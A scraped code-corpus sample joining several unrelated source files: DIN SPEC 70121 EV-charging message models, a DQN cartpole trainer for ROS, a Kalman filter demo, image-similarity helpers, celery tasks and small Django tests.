f"[V2G2-476] Wrong energy transfer mode transfer mode "
f"{requested_energy_mode}",
ResponseCode.FAILED_WRONG_ENERGY_TRANSFER_MODE,
cls,
)
if ("AC_" in requested_energy_mode and dc_params) or (
"DC_" in requested_energy_mode and ac_params
):
raise V2GMessageValidationError(
"[V2G2-477] Wrong charge parameters for requested energy "
f"transfer mode {requested_energy_mode}",
ResponseCode.FAILED_WRONG_CHARGE_PARAMETER,
cls,
)
return values
class ChargeParameterDiscoveryRes(Response):
"""See section 9.4.1.6.3 in DIN SPEC 70121"""
evse_processing: EVSEProcessing = Field(..., alias="EVSEProcessing")
sa_schedule_list: SAScheduleList = Field(None, alias="SAScheduleList")
"""
In the scope of DIN SPEC 70121, the element “AC_EVSEChargeParameter”
shall not be used.
"""
ac_charge_parameter: ACEVSEChargeParameter = Field(
None, alias="AC_EVSEChargeParameter"
)
dc_charge_parameter: DCEVSEChargeParameter = Field(
None, alias="DC_EVSEChargeParameter"
)
# TODO Reactivate the validator once you figured out how to deal with the
# failed_responses dict
# @root_validator(pre=True)
# def either_ac_or_dc_charge_params(cls, values):
# """
# Either ac_charge_parameter or dc_charge_parameter must be set,
# depending on whether the chosen energy transfer mode is AC or DC.
#
# Pydantic validators are "class methods",
# see https://pydantic-docs.helpmanual.io/usage/validators/
# """
# # pylint: disable=no-self-argument
# # pylint: disable=no-self-use
# if one_field_must_be_set(['ac_charge_parameter',
# 'AC_EVSEChargeParameter',
# 'dc_charge_parameter',
# 'DC_EVSEChargeParameter'],
# values,
# True):
# return values
# TODO Reactivate the validator once you figured out how to deal with the
# failed_responses dict
# @root_validator()
# def schedule_must_be_set_if_processing_finished(cls, values):
# """
# Once the field evse_processing is set to EVSEProcessing.FINISHED, the
# fields sa_schedule_list and ac_charge_parameter must be set.
# """
# # pylint: disable=no-self-argument
# # pylint: disable=no-self-use
# evse_processing, schedules, ac_charge_params, dc_charge_params = \
# values.get('evse_processing'), \
# values.get('sa_schedule_list'), \
# values.get('ac_charge_parameter'), \
# values.get('ac_charge_parameter')
# if evse_processing == EVSEProcessing.FINISHED and (
# not schedules or not (ac_charge_params or dc_charge_params)):
# raise ValueError("SECC set EVSEProcessing to 'FINISHED' but either"
# "SAScheduleList or charge parameters are not set")
# return values
class PowerDeliveryReq(BodyBase):
"""See section 9.4.1.7.2 in DIN SPEC 70121"""
ready_to_charge: bool = Field(..., alias="ReadyToChargeState")
charging_profile: ChargingProfile = Field(None, alias="ChargingProfile")
dc_ev_power_delivery_parameter: DCEVPowerDeliveryParameter = Field(
None, alias="DC_EVPowerDeliveryParameter"
)
class PowerDeliveryRes(Response):
"""See section 9.4.1.7.3 in DIN SPEC 70121"""
""" In the scope of DIN SPEC 70121, AC_EVSEStatus shall not be used. """
ac_evse_status: ACEVSEStatus = Field(None, alias="AC_EVSEStatus")
dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
# TODO Reactivate the validator once you figured out how to deal with the
# failed_responses dict
# @root_validator(pre=True)
# def either_ac_or_dc_status(cls, values):
# """
# Either ac_evse_status or dc_evse_status must be set,
# depending on whether the chosen energy transfer mode is AC or DC.
#
# Pydantic validators are "class methods",
# see https://pydantic-docs.helpmanual.io/usage/validators/
# """
# # pylint: disable=no-self-argument
# # pylint: disable=no-self-use
# if one_field_must_be_set(['ac_evse_status',
# 'AC_EVSEStatus',
# 'dc_evse_status',
# 'DC_EVSEStatus'],
# values,
# True):
# return values
class CableCheckReq(BodyBase):
"""See section 9.4.2.2.2 in DIN SPEC 70121"""
dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
class CableCheckRes(Response):
"""See section 9.4.2.2.3 in DIN SPEC 70121"""
dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
evse_processing: EVSEProcessing = Field(..., alias="EVSEProcessing")
class PreChargeReq(BodyBase):
"""
See section 9.4.2.3.2 in DIN SPEC 70121
With the Pre Charging Request the EV asks the EVSE to apply certain values
for output voltage and output current. Since the contactors of the EV are
open during Pre Charging, the actual current flow from the EVSE to the EV
will be very small, i. e. in most cases smaller than the requested output
current. The EV may use several Pre Charging Request/Response message pairs
in order to precisely adjust the EVSE output voltage to the EV RESS voltage
measured inside the EV.
"""
dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
ev_target_voltage: PVEVTargetVoltageDin = Field(..., alias="EVTargetVoltage")
ev_target_current: PVEVTargetCurrentDin = Field(..., alias="EVTargetCurrent")
class PreChargeRes(Response):
"""See section 9.4.2.3.3 in DIN SPEC 70121"""
dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
evse_present_voltage: PVEVSEPresentVoltageDin = Field(
..., alias="EVSEPresentVoltage"
)
class CurrentDemandReq(BodyBase):
"""See section 9.4.2.4.2 in DIN SPEC 70121"""
dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
ev_target_current: PVEVTargetCurrentDin = Field(..., alias="EVTargetCurrent")
ev_max_voltage_limit: PVEVMaxVoltageLimitDin = Field(
None, alias="EVMaximumVoltageLimit"
)
ev_max_current_limit: PVEVMaxCurrentLimitDin = Field(
None, alias="EVMaximumCurrentLimit"
)
ev_max_power_limit: PVEVMaxPowerLimitDin = Field(None, alias="EVMaximumPowerLimit")
bulk_charging_complete: bool = Field(None, alias="BulkChargingComplete")
charging_complete: bool = Field(..., alias="ChargingComplete")
remaining_time_to_full_soc: PVRemainingTimeToFullSOCDin = Field(
None, alias="RemainingTimeToFullSoC"
)
remaining_time_to_bulk_soc: PVRemainingTimeToBulkSOCDin = Field(
None, alias="RemainingTimeToBulkSoC"
)
ev_target_voltage: PVEVTargetVoltageDin = Field(..., alias="EVTargetVoltage")
class CurrentDemandRes(Response):
"""See section 9.4.2.4.3 in DIN SPEC 70121"""
dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
evse_present_voltage: PVEVSEPresentVoltageDin = Field(
..., alias="EVSEPresentVoltage"
)
evse_present_current: PVEVSEPresentCurrentDin = Field(
..., alias="EVSEPresentCurrent"
)
evse_current_limit_achieved: bool = Field(..., alias="EVSECurrentLimitAchieved")
evse_voltage_limit_achieved: bool = Field(..., alias="EVSEVoltageLimitAchieved")
evse_power_limit_achieved: bool = Field(..., alias="EVSEPowerLimitAchieved")
evse_max_voltage_limit: PVEVSEMaxVoltageLimitDin = Field(
None, alias="EVSEMaximumVoltageLimit"
)
evse_max_current_limit: PVEVSEMaxCurrentLimitDin = Field(
None, alias="EVSEMaximumCurrentLimit"
)
evse_max_power_limit: PVEVSEMaxPowerLimitDin = Field(
None, alias="EVSEMaximumPowerLimit"
)
class WeldingDetectionReq(BodyBase):
"""See section 9.4.2.5.2 in DIN SPEC 70121"""
dc_ev_status: DCEVStatus = Field(..., alias="DC_EVStatus")
class WeldingDetectionRes(Response):
"""See section 9.4.2.5.3 in DIN SPEC 70121"""
dc_evse_status: DCEVSEStatus = Field(..., alias="DC_EVSEStatus")
evse_present_voltage: PVEVSEPresentVoltageDin = Field(
..., alias="EVSEPresentVoltage"
)
class SessionStopReq(BodyBase):
"""See section 9.4.1.8.2 in DIN SPEC 70121"""
class SessionStopRes(Response):
"""See section 9.4.1.8.3 in DIN SPEC 70121"""
class Body(BaseModel):
"""
The body element of a V2GMessage.
See section 9.3.4 Message Body Definition in DIN SPEC 70121
"""
session_setup_req: SessionSetupReq = Field(None, alias="SessionSetupReq")
session_setup_res: SessionSetupRes = Field(None, alias="SessionSetupRes")
service_discovery_req: ServiceDiscoveryReq = Field(
None, alias="ServiceDiscoveryReq"
)
service_discovery_res: ServiceDiscoveryRes = Field(
None, alias="ServiceDiscoveryRes"
)
service_payment_selection_req: ServicePaymentSelectionReq = Field(
None, alias="ServicePaymentSelectionReq"
)
service_payment_selection_res: ServicePaymentSelectionRes = Field(
None, alias="ServicePaymentSelectionRes"
)
contract_authentication_req: ContractAuthenticationReq = Field(
None, alias="ContractAuthenticationReq"
)
contract_authentication_res: ContractAuthenticationRes = Field(
None, alias="ContractAuthenticationRes"
)
charge_parameter_discovery_req: ChargeParameterDiscoveryReq = Field(
None, alias="ChargeParameterDiscoveryReq"
)
charge_parameter_discovery_res: ChargeParameterDiscoveryRes = Field(
None, alias="ChargeParameterDiscoveryRes"
)
power_delivery_req: PowerDeliveryReq = Field(None, alias="PowerDeliveryReq")
power_delivery_res: PowerDeliveryRes = Field(None, alias="PowerDeliveryRes")
cable_check_req: CableCheckReq = Field(None, alias="CableCheckReq")
cable_check_res: CableCheckRes = Field(None, alias="CableCheckRes")
pre_charge_req: PreChargeReq = Field(None, alias="PreChargeReq")
pre_charge_res: PreChargeRes = Field(None, alias="PreChargeRes")
current_demand_req: CurrentDemandReq = Field(None, alias="CurrentDemandReq")
current_demand_res: CurrentDemandRes = Field(None, alias="CurrentDemandRes")
welding_detection_req: WeldingDetectionReq = Field(
None, alias="WeldingDetectionReq"
)
welding_detection_res: WeldingDetectionRes = Field(
None, alias="WeldingDetectionRes"
)
session_stop_req: SessionStopReq = Field(None, alias="SessionStopReq")
session_stop_res: SessionStopRes = Field(None, alias="SessionStopRes")
def get_message_name(self) -> str:
"""Returns the name of the one V2GMessage that is set for Body."""
for k in self.__dict__.keys():
if getattr(self, k):
return str(getattr(self, k))
return ""
def get_message(self) -> Optional[BodyBase]:
"""Returns the name of the one V2GMessage that is set for Body."""
for k in self.__dict__.keys():
if getattr(self, k):
return getattr(self, k)
return None
def get_message_and_name(self) -> Tuple[Optional[BodyBase], str]:
"""Returns the name of the one V2GMessage that is set for Body."""
for k in self.__dict__.keys():
if getattr(self, k):
return getattr(self, k), str(getattr(self, k))
return None, ""
def get_msg_type(msg_name: str) -> Optional[Type[BodyBase]]:
"""
Returns the message type corresponding to the message name provided, or
None if not match is found.
Args:
msg_name: The name of the message (e.g. SessionSetupReq)
Returns: The message type corresponding to the given message name
"""
msg_dict = {
"SessionSetupReq": SessionSetupReq,
"SessionSetupRes": SessionSetupRes,
"ServiceDiscoveryReq": ServiceDiscoveryReq,
"ServiceDiscoveryRes": ServiceDiscoveryRes,
"ServicePaymentSelectionReq": ServicePaymentSelectionReq,
"ServicePaymentSelectionRes": ServicePaymentSelectionRes,
"ContractAuthenticationReq": ContractAuthenticationReq,
"ContractAuthenticationRes": ContractAuthenticationRes,
"ChargeParameterDiscoveryReq": ChargeParameterDiscoveryReq,
"ChargeParameterDiscoveryRes": ChargeParameterDiscoveryRes,
"CableCheckReq": CableCheckReq,
"CableCheckRes": CableCheckRes,
"PreChargeReq": PreChargeReq,
"PreChargeRes": PreChargeRes,
"PowerDeliveryReq": PowerDeliveryReq,
"PowerDeliveryRes": PowerDeliveryRes,
"CurrentDemandReq": CurrentDemandReq,
"CurrentDemandRes": CurrentDemandRes,
"WeldingDetectionReq": WeldingDetectionReq,
"WeldingDetectionRes": WeldingDetectionRes,
"SessionStopReq": SessionStopReq,
"SessionStopRes": SessionStopRes,
}
return msg_dict.get(msg_name, None)
| sahabulh/switchev_iso15118 | iso15118/shared/messages/din_spec/body.py | body.py | py | 21,706 | python | en | code | 1 | github-code | 90 |
9991566360 | # -*- coding: UTF-8 -*-
from example import models
def demo_simple():
shop_info = models.Shop(
name='My Shop',
address='My Address'
)
shop_info.save()
def demo_partition():
from random import randint
shop_id = randint(1, 10)
shop_customer = models.ShopCustomer(
shop_id=shop_id,
name='Customer 1',
mobile_number='123456'
)
shop_customer.save()
print('shop_id=%s' % shop_id)
| karla9/django_partition | demo_app/example/views.py | views.py | py | 454 | python | en | code | 1 | github-code | 90 |
12542974713 | import numpy as np
from scipy.spatial import distance
def get_closest_images(images, image_index_to_measure, num_results=5):
"""
Calculate the manhattan distance between the image of
image_index_to_measure and all other images. Return the indicies
of the closest images and their distances.
:param list(list(int)) images: images to measure distance to
:param int image_index_to_measure: index of image with which to
measure distances
:param int num_results: number of distances and indicies to return
:return list(float) distances_closest: distances of closest images
:return list(int) indicies_closest: indicies of closest images
"""
distances = [distance.cityblock(images[image_index_to_measure], image)
for image in images]
indicies_closest = sorted(
range(len(distances)), key=lambda k: distances[k]
)[1:1+num_results]
distances_closest = sorted(distances)[1:1+num_results]
return distances_closest, indicies_closest
def get_concatenated_images(images, image_indicies_to_concatenate):
"""
Create a row of concatenated images.
:param list(list(float)) images: a list of images
:param list(int) image_indicies_to_concatenate: indicies of images
to concatenate
:return list(list(float)): the desired images concatenated
"""
concat_image = np.concatenate(
[np.uint8(images[index]) for index in image_indicies_to_concatenate],
axis=1
)
return concat_image
| VanLifeInc/models | utils/image_similarity.py | image_similarity.py | py | 1,518 | python | en | code | 1 | github-code | 90 |
42271872866 | #!/usr/bin/env python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data.dataset import Dataset
from torch.utils.data import DataLoader
from robot_sim.srv import RobotAction
from robot_sim.srv import RobotActionRequest
from robot_sim.srv import RobotActionResponse
from robot_sim.srv import RobotPolicy
from robot_sim.srv import RobotPolicyRequest
from robot_sim.srv import RobotPolicyResponse
import rospy
import numpy as np
import random
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.position = 0
self.memory = []
def store(self, state):
if len(self.memory) < self.capacity:
self.memory.append(None)
self.memory[self.position] = state
if self.position+1 < self.capacity:
self.position += 1
else:
self.position = 0
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
class MyDNN(nn.Module):
def __init__(self, input_dim):
super(MyDNN, self).__init__() # find parent of this class
self.fc1 = nn.Linear(input_dim, 32)
#torch.nn.init.xavier_uniform_(self.fc1.weight, gain=1.0)
self.fc1.weight.data.normal_(0, 0.1)
self.fc2 = nn.Linear(32, 2)
#torch.nn.init.xavier_uniform_(self.fc2.weight, gain=1.0)
self.fc2.weight.data.normal_(0, 0.1)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
return x
def predict(self, features):
self.eval()
#print(features)
features = torch.from_numpy(features).float()
return self.forward(features).detach().numpy()
class Env(object):
def __init__(self):
self.cartpole_action_service = rospy.ServiceProxy('cartpole_robot', RobotAction)
self.req = RobotActionRequest()
def get_random_sign(self):
return 1.0 if random.random() < 0.5 else -1.0
def reset(self):
self.req.reset_robot = True
self.req.reset_pole_angle = np.random.uniform(np.deg2rad(0), np.deg2rad(3))*self.get_random_sign()
#print(req.reset_pole_angle)
response = self.cartpole_action_service(self.req)
response = response.robot_state
response = np.array(response)
# self.req.reset_robot = False
return response
def observation(self, action):
self.req.reset_robot = False
action = [action]
self.req.action = action
#print(self.req)
response = self.cartpole_action_service(self.req)
response = response.robot_state
response = np.array(response)
#print(response)
if np.abs(response[1]) >= np.deg2rad(6) or np.abs(response[0]) >= 1.2:
response = None
reward = 0
else:
reward = 1
return reward, response
def action(self, output):
#actions = np.linspace(-10, 10, num=21)
actions = np.array([-10,10])
n = np.argmax(output)
action = actions[n]
#k = np.array([21.13, -320.74, 30.23, -70.18])
#action = np.dot(k, np.array(output))
#print('-----')
#print(action)
#print(action)
return action
class Train(object):
def __init__(self):
self.episode_num = 200
self.batch_size = 32
T = 200
self.action_nn = MyDNN(4)
self.target_nn = MyDNN(4)
self.target_nn.load_state_dict(self.action_nn.state_dict())
self.target_nn.eval()
self.optimizer = optim.RMSprop(self.action_nn.parameters())
self.memory = ReplayMemory(10000)
for i in range(self.episode_num):
init_state = Env().reset()
episode_reward = 0
state = init_state
for t in range(T):
action = self.select_action(i, state)
#print(action)
reward, new_state = Env().observation(action)
D = [state, action, reward, new_state]
self.memory.store(D)
episode_reward += reward
state = new_state
#
self.train_nn()
if new_state is None:
break
if i % 20 == 0:
self.target_nn.load_state_dict(self.action_nn.state_dict())
print(episode_reward)
print('ready')
self.implement()
def select_action(self, episode, state):
eps = max(1 - episode / self.episode_num, 0.01)
#eps = 0.2
sample = random.random()
#actions = np.linspace(-10, 10, num=21)
actions = np.array([-10,10])
if sample > eps:
output = self.action_nn.predict(state)
n = np.argmax(output)
else:
n = random.randint(0,1)
action = actions[n]
#print(action)
return action
def train_nn(self):
gamma = 0.999
if len(self.memory) < self.batch_size:
return
mini_batch = self.memory.sample(self.batch_size)
mini_batch = np.array(mini_batch)
#print(mini_batch)
state_batch = mini_batch[:,0]
action_batch = mini_batch[:,1]
reward_batch = mini_batch[:,2]
#print(reward_batch)
next_state_batch = mini_batch[:,3]
state_values = []
next_state_value = np.zeros(self.batch_size)
self.action_nn.train()
for i in range(self.batch_size):
if next_state_batch[i] is not None:
next_state_values = self.target_nn.predict(next_state_batch[i])
#print(next_state_values)
next_state_value[i] = max(next_state_values)
if action_batch[i] == -10:
s = self.action_nn.predict(state_batch[i])[0]
else:
s = self.action_nn.predict(state_batch[i])[1]
#print(self.action_nn.predict(state_batch[i]))
state_values.append(s)
state_values = np.array(state_values)
state_value = state_values
expected_state_value = (next_state_value * gamma) + np.array(reward_batch)
#print(expected_state_value)
#print(state_value)
expected_state_value = expected_state_value.astype(np.double)
state_value = state_value.astype(np.double)
expected_state_value = expected_state_value.reshape(-1,1)
#state_value = state_value.reshape(-1,1)
state_value = torch.tensor(state_value, requires_grad=True)
expected_state_value = torch.tensor(expected_state_value, requires_grad=True)
#print(expected_state_value)
#print(state_value)
self.optimizer.zero_grad()
#print(state_value)
loss = F.smooth_l1_loss(state_value, expected_state_value)
print(loss)
# optimize the model
loss.backward()
#for param in self.action_nn.parameters():
#print(param.grad)
# if param.grad is not None:
# param.grad.data.clamp_(-1, 1)
self.optimizer.step()
def implement(self):
rospy.init_node('cartpole_policy', anonymous=True)
policy_service = rospy.Service('cartpole_policy', RobotPolicy, self.callback)
print('yes')
rospy.spin()
def callback(self, req):
print('continue')
#req = RobotPolicyRequest
state = req.robot_state
#print('---------')
#print(state)
#print('----------')
state = np.array(state)
output = self.target_nn.predict(state)
#print('-----')
#print(output)
action = Env().action(output)
action = [action]
#print(response)
return RobotPolicyResponse(action)
if __name__ == '__main__':
rospy.init_node('cartpole_policy', anonymous=True)
t = Train()
print('ok')
| Minglunt/RobotLearning | project3_ws/src/robot_sim/scripts/learn_dqn.py | learn_dqn.py | py | 7,973 | python | en | code | 1 | github-code | 90 |
10142830356 | import numpy as np
import matplotlib.pyplot as plt
def initPlot(N):
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.axis([0, N, 0, 500])
return ax
class filterKalman(object):
def __init__(self):
self.optimal = False
def setModelStateTransition(self, modelStateTransition):
self.F = np.matrix(modelStateTransition)
def setModelControlInput(self, modelControlInput):
self.G = np.matrix(modelControlInput)
def setParameterControlInput(self, parameterControlInput):
self.u = np.matrix(parameterControlInput)
def setNoiseProcess(self, noiseProcess):
self.Q = np.matrix(noiseProcess)
def setModelObservation(self, modelObservation):
self.H = np.matrix(modelObservation)
def setNoiseObservation(self, noiseObservation):
self.R = np.matrix(noiseObservation)
def setState(self, state, covariance=None):
self.x = np.matrix(state)
N = len(self.x)
if covariance == None:
self.P = np.matrix(zeros((N, N)))
else:
self.P = np.matrix(covariance)
self.E = np.matrix(np.diag(np.ones(N)))
def setOptimalKalmanGain(self, optimal):
self.optimal = optimal
def setObservation(self, observation):
self.z = observation
def __predict(self):
self.x = self.F * self.x + self.G * self.u
self.P = self.F * self.P * self.F.T + self.Q
def __update(self):
K = self.P * self.H.T * (self.H * self.P * self.H.T + self.R).I
e = self.z - self.H * self.x
self.x = self.x + K * e
KH = self.E - K * self.H
if self.optimal == True:
self.P = KH * self.P
else:
self.P = KH * self.P * KH.T + K * self.R * K.T
def advance(self, observation):
self.z = observation
self.__predict()
self.__update()
def getState(self):
return self.x
if __name__ == '__main__':
x0 = 0 # m
v0 = 20 # m s-1
a0 = 2 # m s-2
sx = 1 # m s-1
sxm = 20 # m s-1
sv = 1 # m s-2
sa = 0.1 # m s-1
dt = 0.1 # s
Nm = 100
kalman = filterKalman()
kalman.setModelStateTransition([[1, dt], [0, 1]])
kalman.setModelControlInput([[dt ** 2 / 2], [dt]])
kalman.setParameterControlInput(a0)
kalman.setNoiseProcess(sa ** 2 * np.array([[dt ** 4 / 4, dt ** 3 / 2], [dt ** 3 / 2, dt ** 2]]))
kalman.setModelObservation([1, 0])
kalman.setNoiseObservation([sxm ** 2])
kalman.setState([[x0], [v0]], [[sx ** 2, 0], [0, sv ** 2]])
ex = np.random.normal(0, sxm, Nm)
z = np.array([x0 + v0 * (i + 1) * dt + a0 * ((i + 1) * dt) ** 2 / 2 + ex[i] for i in range(Nm)])
ax = initPlot(Nm)
xx = np.zeros((2, Nm))
#kalman.setOptimalKalmanGain(True)
for i in range(Nm):
kalman.advance(z[i])
xx[:, i] = kalman.getState().T
ax.plot(z, 'ko')
ax.plot(xx[0, :], 'r-', lw=2)
plt.show()
| fgroes/statistics | kalman/main.py | main.py | py | 2,609 | python | en | code | 0 | github-code | 90 |
15772099290 | """Example module of celery tasks."""
import logging
import time
from annuaire.annuaire.database import populate_lawyers
from annuaire.annuaire.exception import AnnuaireException
from annuaire.annuaire.query import get_form_page, search
from annuaire.tasks import celery
log = logging.getLogger(__name__)
@celery.task(bind=True, track_started=True)
def add(self, x: int, y: int) -> int:
"""
Compute an addition.
:param self:
:param x:
:param y:
:return:
"""
time.sleep(5)
return x + y
@celery.task(bind=True, track_started=True)
def scrap_one_barreau(self, barreau_code):
"""
:param self:
:param barreau_code:
:return:
"""
result = get_form_page()
try:
items = search(barreau_code, result["cookies"])
populate_lawyers(items)
except AnnuaireException as e:
log.warning(e.message)
self.retry(max_retries=3, countdown=60)
| djacomy/lawer-annuaire | annuaire/tasks/add.py | add.py | py | 927 | python | en | code | 0 | github-code | 90 |
22357945435 | import argparse
import asyncio
import json
from marilyn_api.client import AsyncClient
async def main(
api_root: str, headers: dict, project_id: int, params: dict = None, save_to_file: bool = False
):
aclient = AsyncClient(api_root, headers)
data = []
async for page in aclient.iter_project_placements(project_id, params=params, headers=headers):
if save_to_file:
data += page["items"]
else:
for item in page["items"]:
print("RECORD:", item)
if save_to_file:
with open(save_to_file, "w") as f:
json.dump(data, f)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Downloading project placements to a JSON file"
)
parser.add_argument("-r", "--api-root", required=True, type=str, help="Api root. Example https://app.mymarilyn.ru")
parser.add_argument("-a", "--account", required=True, type=str, help="Account ID")
parser.add_argument("-t", "--token", required=True, type=str, help="Token for auth")
parser.add_argument("-p", "--project", required=True, type=int, help="Project ID")
parser.add_argument(
"-c",
"--params-config",
required=False,
default=None,
type=str,
help="The path to the JSON file of the GET params for the request",
)
parser.add_argument("-f", "--save-to-file", default=False, type=str, help="Save data to file")
args = parser.parse_args()
headers = {
"X-API-Account": args.account,
"X-API-Token": args.token,
}
asyncio.run(main(args.api_root, headers, args.project, args.params_config, args.save_to_file))
| pavelmaksimov/marilyn-api | Examples/project_placements.py | project_placements.py | py | 1,675 | python | en | code | 0 | github-code | 90 |
31256817977 | from collections import deque
import copy
def bfs2(visited3,target):
que = deque()
sum = 0
for i in range(N+1):
if not visited3[i] :
que.append([i,1])
visited3[i]=True
sum += nums[i-1]
while que :
now ,count= que.popleft()
if count == target :
return [count,sum]
for j in graph[now]:
if not visited3[j] :
count +=1
sum += nums[j-1]
que.append([j,count])
visited3[j] = True
return [100000,1000000]
def bfs(visit):
result = []
for i in range(1,N):
target = i
visited=copy.deepcopy(visit)
que = deque()
que.append([1,1,0,visited])
visited[1]=True
while que :
now , count ,sum,visited= que.popleft()
sum+=nums[now-1]
if count == target :
visited2=copy.deepcopy(visited)
count2,sum2 = bfs2(visited2,N-count)
# if i == 5 :
# # print(count,count2,sum,sum2,visited,visited2)
if count + count2 == N :
#print(count,count2,sum,sum2,visited,visited2)
result.append(abs(sum-sum2))
if count >target :
break
for j in graph[now]:
if not visited[j] :
if i == 5 :
print(now,j,visited,count)
temp=copy.deepcopy(visited)
temp[j]=True
count +=1
que.append([j,count,sum,temp])
if not result :
return -1
else :
return min(result)
N =int(input())
nums=(list(map(int,input().split())))
graph=[[]]
visit = [False for _ in range(N+1)]
visit[0]=True
for i in range(1,N+1):
temp=list(map(int,input().split()))
graph.append(temp[1:])
print(bfs(visit))
| sungwoo-me/Algorithm | 백준/SK_연습/그래프탐색/17471.py | 17471.py | py | 2,058 | python | en | code | 0 | github-code | 90 |
10225434876 | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 8 10:31:26 2019
@author: eileenlu
"""
import os
import sys
import numpy as np
import pandas as pd
from sklearn.metrics import f1_score
from sklearn.metrics import classification_report
from bert_sklearn import BertTokenClassifier, load_model
def flatten(l):
return [item for sublist in l for item in sublist]
def read_CoNLL2003_format(filename, idx=3):
"""Read file in CoNLL-2003 shared task format"""
# read file
lines = open(filename,encoding='utf-8').read().strip()
# find sentence-like boundaries
lines = lines.split("\n\n")
# split on newlines
lines = [line.split("\n") for line in lines]
# get tokens
tokens = [[l.split()[0] for l in line] for line in lines]
# get labels/tags
labels = [[l.split()[idx] for l in line] for line in lines]
#convert to df
data= {'tokens': tokens, 'labels': labels}
df=pd.DataFrame(data=data)
return df
def get_data(file_path):
data = read_CoNLL2003_format(file_path, 1)
print("Test data: %d sentences, %d tokens"%(len(data),len(flatten(data.tokens))))
return data
if __name__=='__main__':
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
cur=os.path.dirname(os.path.abspath(__file__))
train_path=os.path.join(cur,'data/train.txt')
dev_path=os.path.join(cur,'data/dev.txt')
test_path=os.path.join(cur,'data/test.txt')
train, dev, test = get_data(train_path),get_data(dev_path),get_data(test_path)
X_train, y_train = train['tokens'], train['labels']
X_dev, y_dev = dev['tokens'], dev['labels']
X_test, y_test = test['tokens'], test['labels']
label_list = np.unique(flatten(y_train))
label_list = list(label_list)
model = BertTokenClassifier(bert_model='bert-base-chinese',
epochs=20,
learning_rate=2e-5,
train_batch_size=16,
eval_batch_size=16,
ignore_label=['O'])
print("Bert wordpiece tokenizer max token length in train: %d tokens"% model.get_max_token_len(X_train))
print("Bert wordpiece tokenizer max token length in dev: %d tokens"% model.get_max_token_len(X_dev))
print("Bert wordpiece tokenizer max token length in test: %d tokens"% model.get_max_token_len(X_test))
model.max_seq_length = 512
print(model)
# finetune model on train data
model.fit(X_train, y_train)
model.save(os.path.join(cur,r'checkpoint/bert_sklearn07311.h5'))
f1_dev = model.score(X_dev, y_dev)
print("Dev f1: %0.02f"%(f1_dev))
# score model on test data
f1_test = model.score(X_test, y_test)
print("Test f1: %0.02f"%(f1_test))
| MenglinLu/Chinese-clinical-NER | bert_sklearn_bioes/train_bert_sklearn.py | train_bert_sklearn.py | py | 2,809 | python | en | code | 331 | github-code | 90 |
9485039200 | def checkIfListsAreEqual(list1, list2):
for i in list1:
if i not in list2:
return False
return True
def checkIfListsAreEqual2(list1, list2):
isEqual = True
for i in list1:
if i not in list2:
isEqual = False
break
return isEqual
print(checkIfListsAreEqual([1, 2], [1, 3])) # False
print(checkIfListsAreEqual([5, 6], [5, 6])) # True
| kelvin-homann/refugeeks | python_1/probeklausur/aufgabe_5.py | aufgabe_5.py | py | 411 | python | en | code | 2 | github-code | 90 |
32300099357 | import json
import tensorflow as tf
import numpy as np
from optparse import OptionParser
from tensorflow.python.lib.io.file_io import FileIO
from utils import SamplesIterator
from trainer import SupervisedTrainer
parser = OptionParser()
parser.add_option('--data-dir', dest='data_dir')
parser.add_option('--job-dir', dest='models_dir')
parser.add_option('--run-name', dest='run_name')
options, _ = parser.parse_args()
print('Data dir:', options.data_dir)
print('Models dir:', options.models_dir)
print('Run name:', options.run_name)
def load_data(name):
fullpath = '{0}/{1}'.format(options.data_dir, name)
print('Load:', fullpath)
return json.load(FileIO(fullpath, 'r'))
embeddings = np.asarray(load_data('embeddings.json'))
slots_dict = load_data('slots_dictionary.json')
actions_dict = load_data('actions_dictionary.json')
samples_train = load_data('embedded_frames_train.json')
samples_test = load_data('embedded_frames_test.json')
def train(n_epochs, batch_size=64):
train_samples_iterator = SamplesIterator(samples_train, batch_size=batch_size)
test_samples_iterator = SamplesIterator(samples_test, batch_size=batch_size)
trainer = SupervisedTrainer(
n_slots=len(slots_dict),
n_actions=len(actions_dict),
word_embeddings_shape=embeddings.shape,
save_path='{0}/ac_agent_{1}'.format(options.models_dir, options.run_name),
batch_size=batch_size
)
trainer._sess.run(tf.global_variables_initializer())
trainer.initialize_word_embeddings(embeddings)
for e in range(n_epochs):
print('Epoch:', e)
trainer.reset()
for i, batch in enumerate(train_samples_iterator.batches()):
trainer.train_batch(e, i, batch)
trainer.save_checkpoint(e)
trainer.reset()
for i, batch in enumerate(test_samples_iterator.batches()):
trainer.test_batch(e, i, batch)
if __name__ == '__main__':
train(
n_epochs = 20,
batch_size = 64
)
| marekgalovic/jamesbot | jamesbot/agent/train.py | train.py | py | 2,000 | python | en | code | 1 | github-code | 90 |
25855276303 | import logging
def add():
logging.info("OKA")
return "ok"
def main():
format_log = "%(asctime)s: %(levelname)s: %(funcName)s Line: %(lineno)d %(message)s"
logging.basicConfig(level=logging.DEBUG, filename="output.log", format=format_log)
logging.debug("DEBUG")
logging.info("INFO")
logging.warning("WARNING")
logging.error("ERROR")
logging.critical("CRITICAL")
add()
if __name__ == "__main__":
main() | ccruz182/Python | logging/custom_logging.py | custom_logging.py | py | 448 | python | en | code | 0 | github-code | 90 |
30071980500 | from django.test.testcases import TestCase
from log.log_content.log_generator import LogConfig, AdditionalInfoBeforeDelete
class LogGenerator:
pass
class TestLogConfig(TestCase):
test_url_name = 'test-register'
def test_create_log_config(self):
log1 = LogConfig()
log2 = LogConfig()
assert id(log1) == id(log2)
def test_register_config(self):
log = LogConfig()
log.register(self.test_url_name, 'get')(LogGenerator)
test_config = log.get_config()
assert test_config[self.test_url_name]['GET'] == LogGenerator
